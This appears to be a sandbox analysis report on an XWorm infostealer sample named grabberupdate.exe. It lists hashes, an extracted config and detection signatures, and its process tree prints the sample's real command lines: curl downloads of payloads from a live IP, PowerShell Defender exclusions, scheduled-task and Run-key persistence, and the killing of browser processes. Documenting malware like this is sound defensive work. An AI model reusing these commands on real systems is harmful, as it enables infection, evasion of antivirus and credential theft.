Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
286s -
max time network
303s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
22/05/2024, 21:27
Static task
static1
Behavioral task
behavioral1
Sample
grabberupdate.exe
Resource
win10v2004-20240226-en
General
-
Target
grabberupdate.exe
-
Size
87KB
-
MD5
ab378d6539627c52dbfc272c83eb420c
-
SHA1
039060f0fdefbe0a62147a7bbad9b1a526a78d61
-
SHA256
2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2
-
SHA512
afe3be5f89ad67e2c4440d44c6ed890853eecb6cf34faed20d61ae49f30fa30a5cc390393b3ef4609a34a2121b6831cacf00ee6aa62c268e0b9fce0223bb0222
-
SSDEEP
1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfNxFOy:Hq6+ouCpk2mpcWJ0r+QNTBfNZ
Malware Config
Extracted
xworm
-
Install_directory
%AppData%
-
install_file
wlms.exe
-
pastebin_url
https://pastebin.com/raw/Xuc6dzua
Signatures
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0006000000000500-4.dat family_xworm behavioral1/memory/3140-7-0x0000000000170000-0x0000000000186000-memory.dmp family_xworm behavioral1/files/0x00040000000163e4-91.dat family_xworm behavioral1/memory/3488-95-0x0000000000490000-0x00000000004A6000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 208 powershell.exe 3776 powershell.exe 4604 powershell.exe 4292 powershell.exe 32 powershell.exe 1860 powershell.exe 1444 powershell.exe 1712 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation grabberupdate.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation grabberupdate.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation grabber.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation grabber.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation rm.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation grabberupdate.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation wlms.exe -
Executes dropped EXE 15 IoCs
pid Process 3140 wlms.exe 4780 grabber.exe 1712 grabber.exe 2220 wlms.exe 2184 ram.exe 3488 rm.exe 1104 wlms.exe 3328 rm.exe 544 wlms.exe 2392 wlms.exe 4092 winlogon.exe 3576 winlogon.exe 3344 wlms.exe 2304 winlogon.exe 1012 wlms.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wlms = "C:\\Users\\Admin\\AppData\\Roaming\\wlms.exe" wlms.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "C:\\ProgramData\\winlogon.exe" rm.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 64 pastebin.com 85 pastebin.com 63 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 60 ip-api.com 83 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1960 schtasks.exe 4896 schtasks.exe -
Kills process with taskkill 15 IoCs
pid Process 1812 taskkill.exe 4492 taskkill.exe 1088 taskkill.exe 4724 taskkill.exe 2204 taskkill.exe 1988 taskkill.exe 380 taskkill.exe 3488 taskkill.exe 4656 taskkill.exe 2204 taskkill.exe 3292 taskkill.exe 5016 taskkill.exe 3440 taskkill.exe 2900 taskkill.exe 1988 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 32 powershell.exe 32 powershell.exe 32 powershell.exe 1860 powershell.exe 1860 powershell.exe 1860 powershell.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 3140 wlms.exe 3140 wlms.exe 208 powershell.exe 208 powershell.exe 208 powershell.exe 3776 powershell.exe 3776 powershell.exe 4604 powershell.exe 4604 powershell.exe 4292 powershell.exe 4292 powershell.exe 3488 rm.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 3140 wlms.exe Token: SeDebugPrivilege 32 powershell.exe Token: SeDebugPrivilege 1860 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 2220 wlms.exe Token: SeDebugPrivilege 3292 taskkill.exe Token: SeDebugPrivilege 1812 taskkill.exe Token: SeDebugPrivilege 2204 taskkill.exe Token: SeDebugPrivilege 1988 taskkill.exe Token: SeDebugPrivilege 380 taskkill.exe Token: SeDebugPrivilege 3488 taskkill.exe Token: SeDebugPrivilege 4492 taskkill.exe Token: SeDebugPrivilege 5016 taskkill.exe Token: SeDebugPrivilege 3440 taskkill.exe Token: SeDebugPrivilege 4656 taskkill.exe Token: SeDebugPrivilege 2900 taskkill.exe Token: SeDebugPrivilege 1088 taskkill.exe Token: SeDebugPrivilege 4724 taskkill.exe Token: SeDebugPrivilege 2204 taskkill.exe Token: SeDebugPrivilege 1988 taskkill.exe Token: SeDebugPrivilege 3488 rm.exe Token: SeDebugPrivilege 1104 wlms.exe Token: SeDebugPrivilege 208 powershell.exe Token: SeDebugPrivilege 3776 powershell.exe Token: SeDebugPrivilege 544 wlms.exe Token: SeDebugPrivilege 3328 rm.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeDebugPrivilege 4292 powershell.exe Token: SeDebugPrivilege 3488 rm.exe Token: SeDebugPrivilege 2392 wlms.exe Token: SeDebugPrivilege 4092 winlogon.exe Token: SeDebugPrivilege 3576 winlogon.exe Token: SeDebugPrivilege 3344 wlms.exe Token: SeDebugPrivilege 2304 winlogon.exe Token: SeDebugPrivilege 1012 wlms.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3140 wlms.exe 3488 rm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4076 wrote to memory of 4896 4076 grabberupdate.exe 93 PID 4076 wrote to memory of 4896 4076 grabberupdate.exe 93 PID 4896 wrote to memory of 208 4896 cmd.exe 96 PID 4896 wrote to memory of 208 4896 cmd.exe 96 PID 4896 wrote to memory of 2976 4896 cmd.exe 109 PID 4896 wrote to memory of 2976 4896 cmd.exe 109 PID 4896 wrote to memory of 3140 4896 cmd.exe 111 PID 4896 wrote to memory of 3140 4896 cmd.exe 111 PID 3140 wrote to memory of 32 3140 wlms.exe 114 PID 3140 wrote to memory of 32 3140 wlms.exe 114 PID 3140 wrote to memory of 1860 3140 wlms.exe 116 PID 3140 wrote to memory of 1860 3140 wlms.exe 116 PID 3140 wrote to memory of 1444 3140 wlms.exe 118 PID 3140 wrote to memory of 1444 3140 wlms.exe 118 PID 3140 wrote to memory of 1712 3140 wlms.exe 120 PID 3140 wrote to memory of 1712 3140 wlms.exe 120 PID 3140 wrote to memory of 1960 3140 wlms.exe 122 PID 3140 wrote to memory of 1960 3140 wlms.exe 122 PID 2588 wrote to memory of 4060 2588 grabberupdate.exe 126 PID 2588 wrote to memory of 4060 2588 grabberupdate.exe 126 PID 4060 wrote to memory of 1112 4060 cmd.exe 128 PID 4060 wrote to memory of 1112 4060 cmd.exe 128 PID 4060 wrote to memory of 4032 4060 cmd.exe 129 PID 4060 wrote to memory of 4032 4060 cmd.exe 129 PID 4060 wrote to memory of 4780 4060 cmd.exe 132 PID 4060 wrote to memory of 4780 4060 cmd.exe 132 PID 1708 wrote to memory of 1608 1708 grabberupdate.exe 133 PID 1708 wrote to memory of 1608 1708 grabberupdate.exe 133 PID 4780 wrote to memory of 4116 4780 grabber.exe 135 PID 4780 wrote to memory of 4116 4780 grabber.exe 135 PID 1608 wrote to memory of 4368 1608 cmd.exe 137 PID 1608 wrote to memory of 4368 1608 cmd.exe 137 PID 4116 wrote to memory of 216 4116 cmd.exe 138 PID 4116 wrote to memory of 216 4116 cmd.exe 138 PID 1608 wrote to memory of 1904 1608 cmd.exe 139 PID 1608 wrote to memory of 1904 1608 cmd.exe 139 PID 1608 wrote to memory of 1712 1608 cmd.exe 140 PID 1608 wrote to memory of 1712 1608 cmd.exe 140 PID 1712 wrote to memory of 1716 1712 grabber.exe 141 PID 1712 wrote to memory of 1716 1712 grabber.exe 141 PID 1716 wrote to memory of 4728 1716 cmd.exe 143 PID 1716 wrote to memory of 4728 1716 cmd.exe 143 PID 1716 wrote to memory of 3440 1716 cmd.exe 145 PID 1716 wrote to memory of 3440 1716 cmd.exe 145 PID 4116 wrote to memory of 1908 4116 cmd.exe 147 PID 4116 wrote to memory of 1908 4116 cmd.exe 147 PID 1716 wrote to memory of 2184 1716 cmd.exe 148 PID 1716 wrote to memory of 2184 1716 cmd.exe 148 PID 2184 wrote to memory of 3292 2184 ram.exe 149 PID 2184 wrote to memory of 3292 2184 ram.exe 149 PID 2184 wrote to memory of 1812 2184 ram.exe 150 PID 2184 wrote to memory of 1812 2184 ram.exe 150 PID 2184 wrote to memory of 2204 2184 ram.exe 151 PID 2184 wrote to memory of 2204 2184 ram.exe 151 PID 2184 wrote to memory of 1988 2184 ram.exe 152 PID 2184 wrote to memory of 1988 2184 ram.exe 152 PID 2184 wrote to memory of 380 2184 ram.exe 153 PID 2184 wrote to memory of 380 2184 ram.exe 153 PID 2184 wrote to memory of 3488 2184 ram.exe 155 PID 2184 wrote to memory of 3488 2184 ram.exe 155 PID 2184 wrote to memory of 4492 2184 ram.exe 156 PID 2184 wrote to memory of 4492 2184 ram.exe 156 PID 2184 wrote to memory of 5016 2184 ram.exe 157 PID 2184 wrote to memory of 5016 2184 ram.exe 157 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\40AE.tmp\40BE.tmp\40BF.bat C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\system32\curl.execurl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"3⤵PID:208
-
-
C:\Windows\system32\curl.execurl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"3⤵PID:2976
-
-
C:\Users\Admin\AppData\Local\Temp\wlms.exewlms.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wlms.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:32
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wlms.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\wlms.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wlms.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wlms" /tr "C:\Users\Admin\AppData\Roaming\wlms.exe"4⤵
- Creates scheduled task(s)
PID:1960
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5104
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3956 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:81⤵PID:5044
-
C:\Users\Admin\Desktop\grabberupdate.exe"C:\Users\Admin\Desktop\grabberupdate.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DE1.tmp\DE2.tmp\DE3.bat C:\Users\Admin\Desktop\grabberupdate.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\system32\curl.execurl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"3⤵PID:1112
-
-
C:\Windows\system32\curl.execurl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"3⤵PID:4032
-
-
C:\Users\Admin\Desktop\grabber.exegrabber.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6B33.tmp\6B34.tmp\6B35.bat C:\Users\Admin\Desktop\grabber.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\system32\curl.execurl -s -o ram.exe http://188.212.100.57:54391/download/shell.exe5⤵PID:216
-
-
C:\Windows\system32\curl.execurl -s -o rm.exe http://188.212.100.57:54391/download/winlogon.exe5⤵PID:1908
-
-
C:\Users\Admin\Desktop\rm.exerm.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
-
-
C:\Users\Admin\Desktop\wlms.exewlms.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
-
C:\Users\Admin\Desktop\grabberupdate.exe"C:\Users\Admin\Desktop\grabberupdate.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6AE5.tmp\6AE6.tmp\6AE7.bat C:\Users\Admin\Desktop\grabberupdate.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\curl.execurl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"3⤵PID:4368
-
-
C:\Windows\system32\curl.execurl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"3⤵PID:1904
-
-
C:\Users\Admin\Desktop\grabber.exegrabber.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\771A.tmp\771B.tmp\771C.bat C:\Users\Admin\Desktop\grabber.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\system32\curl.execurl -s -o ram.exe http://188.212.100.57:54391/download/shell.exe5⤵PID:4728
-
-
C:\Windows\system32\curl.execurl -s -o rm.exe http://188.212.100.57:54391/download/winlogon.exe5⤵PID:3440
-
-
C:\Users\Admin\Desktop\ram.exeram.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3292
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM kometa.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:380
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM orbitum.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3488
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM centbrowser.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM 7star.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM sputnik.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vivaldi.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epicprivacybrowser.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM uran.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM yandex.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iridium.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
-
C:\Users\Admin\Desktop\rm.exerm.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3488 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\rm.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rm.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"6⤵
- Creates scheduled task(s)
PID:4896
-
-
-
-
-
C:\Users\Admin\Desktop\wlms.exewlms.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
-
C:\Users\Admin\AppData\Roaming\wlms.exeC:\Users\Admin\AppData\Roaming\wlms.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
C:\Users\Admin\AppData\Roaming\wlms.exeC:\Users\Admin\AppData\Roaming\wlms.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
C:\ProgramData\winlogon.exeC:\ProgramData\winlogon.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
C:\ProgramData\winlogon.exeC:\ProgramData\winlogon.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
C:\Users\Admin\AppData\Roaming\wlms.exeC:\Users\Admin\AppData\Roaming\wlms.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
C:\ProgramData\winlogon.exeC:\ProgramData\winlogon.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
C:\Users\Admin\AppData\Roaming\wlms.exeC:\Users\Admin\AppData\Roaming\wlms.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1012
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
944B
MD5e3b6cc0fbea08a0831f0026a696db8b8
SHA14e32202d4700061cfd80d55e42798131c9f530d4
SHA2563284cae7b82be99d93064390ba071ba4321f3f24dd21515b37b2ca9f31b2e8d5
SHA5126a06856f360b48c8bc8a15ffb8d7a6604ec357bcb1d0fad5d71a2cb876929a7b67eb40ba4493998ab1bbae8cb71212e124276f27d5c138a135041c27a41a0b7a
-
Filesize
944B
MD565a68df1062af34622552c4f644a5708
SHA16f6ecf7b4b635abb0b132d95dac2759dc14b50af
SHA256718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35
SHA5124e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d
-
Filesize
944B
MD5c08aea9c78561a5f00398a723fdf2925
SHA12c880cbb5d02169a86bb9517ce2a0184cb177c6e
SHA25663d2688b92da4d1bb69980b7998b9be1595dd9e53951434a9414d019c4f825a7
SHA512d30db2f55bbda7102ffe90520d233355633313dcc77cdb69a26fdbb56e59dd41793def23d69dc5dc3f94c5bd41d3c26b3628886fd2edbed2df0b332e9a21f95c
-
Filesize
944B
MD59bf2b1a5d4f6bd85aa4e75d833186aaa
SHA144cce8cba6525ba252f6a9253ec10a11d8044788
SHA2562f17b4ae194794a15897c5241c20bc086cc3d32797dad4a677103f25bd892524
SHA512f48fe3ca2ee9902bd5e696318aafe95ba0514774ef76b953df77bdb69008a2257cd0ce6784ae05a4e4a9b398cd4977cf55f9a0f8eb8b92625a6256bb9d502379
-
Filesize
944B
MD562623d22bd9e037191765d5083ce16a3
SHA14a07da6872672f715a4780513d95ed8ddeefd259
SHA25695d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA5129a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992
-
Filesize
944B
MD50026cdd9bbc34b9de2447c0eb04c14b5
SHA1ab7713fe5fbbb23031937dd1dc7d0fa238884ad4
SHA256cf5a1c42641a83dd41fe89923591962b7ad189006342c7a67669239688f84a2d
SHA51262aab723672e2731946f4bbf6a3d92609ff94384e324f3c50e803095529baf848ce2cd37219a059ced4c3f559e598bd9b900b9dd8aa0657adca6d845127797fe
-
Filesize
944B
MD5ab24765a7393bd3cef8acbf0a617fba2
SHA1ef2c12a457a11f6204344afed09a39f4d3e803cb
SHA2563a03c7efabe880ae9f283b1cf373d3f09d07ab619028319b3599b643ae140d47
SHA512e16306674a8c89f54467d7fba3857e1e0bdf3729f5de9f4451520cfbddfa535c4d653dde6efcac38efd693e9b3e4965fcd08c559e720c372feca65050b46e355
-
Filesize
202B
MD5040dc40ccd7346ace502b30584d4d5a0
SHA1886b8f5f079db8f5569235aa6dff74c1cf89942d
SHA256f209745a8497c9b93a16dda0bf627dc88662184b00658013fec202e129f64450
SHA5120319239eaebf27ff0f6c4be1b9f737da31d39faccbf47f6d0a0506d2771515928b38981d75365a0307defd530ff68b4de37d0af89519d052037782a741c7dc02
-
Filesize
230B
MD5abdb6860d790577e02cca5005866bbe8
SHA16c87a9e8b0b29ffe358c079a54f06dd9ef5cfb37
SHA256ee13e97e15c3a2f432a7bfd3af278aa38ff88baa7652ea0bfb2e5d9bf5adb8f0
SHA5121bbcf1d4540019aa392234e91e7629fd9f61240b8d7003df3404536810e639f7019a60bb74c2a08be5f855fd96923d0f8e0cdf7fa3a3d25e1e5829487a959fce
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
63KB
MD574820650cbe9027cbd4766d9ef53af42
SHA1d97e675f6526f38ac2b7b7fe720dda538217f3a3
SHA256552b0815f8d176917fa1d0006b72079be0ee1aa2ba7adceffb97f6dd963fb142
SHA51228a34dbe459e21fd01fff30dcc63f2d3c9083ffd04f221aeba9de3401b24b90f6af90bf8929a6ad186d856051bf5d87053e0c1ee8ebc03e752ff3e59ee639f3c
-
Filesize
4B
MD537a6259cc0c1dae299a7866489dff0bd
SHA12be88ca4242c76e8253ac62474851065032d6833
SHA25674234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b
SHA51204f8ff2682604862e405bf88de102ed7710ac45c1205957625e4ee3e5f5a2241e453614acc451345b91bafc88f38804019c7492444595674e94e8cf4be53817f
-
Filesize
120KB
MD54e1e436848d533c9a00b762ac148786d
SHA142962a264fbdbc96eb8267052298be9143ecd8bf
SHA256efcd31afd704c03d8a487a06c795bba7ea0a1cde0866d8fcfd40f4c3ce197bbd
SHA51259d16efac5f0ea7c62d18ef30032eba907b8d6c097463a8244f3d709c85b90ec12387c94a4d8a35dfb59d0cbd2dc02d0b39a1f6bd12c5ccd050d552070fdf30d
-
Filesize
12KB
MD5dd58e11e7c61268d0de8864e0637ff19
SHA1415c42ace743a95877cba3570890bcfb213b689c
SHA2565b85b5c59d8c9e0d592a189a7323199d0abf2b32beeda71700159f14008c4595
SHA51225159f7042bc7ae3db9f3b7eac85f9059a49959f24c1f7b8af5cb55fd0624e3e04496e8ebd915698f11be9585ee1802490136048fa34b688ba2ec1c9665e4b1c
-
Filesize
7.6MB
MD52c93399e0b0fc11cd03a56fc844a4816
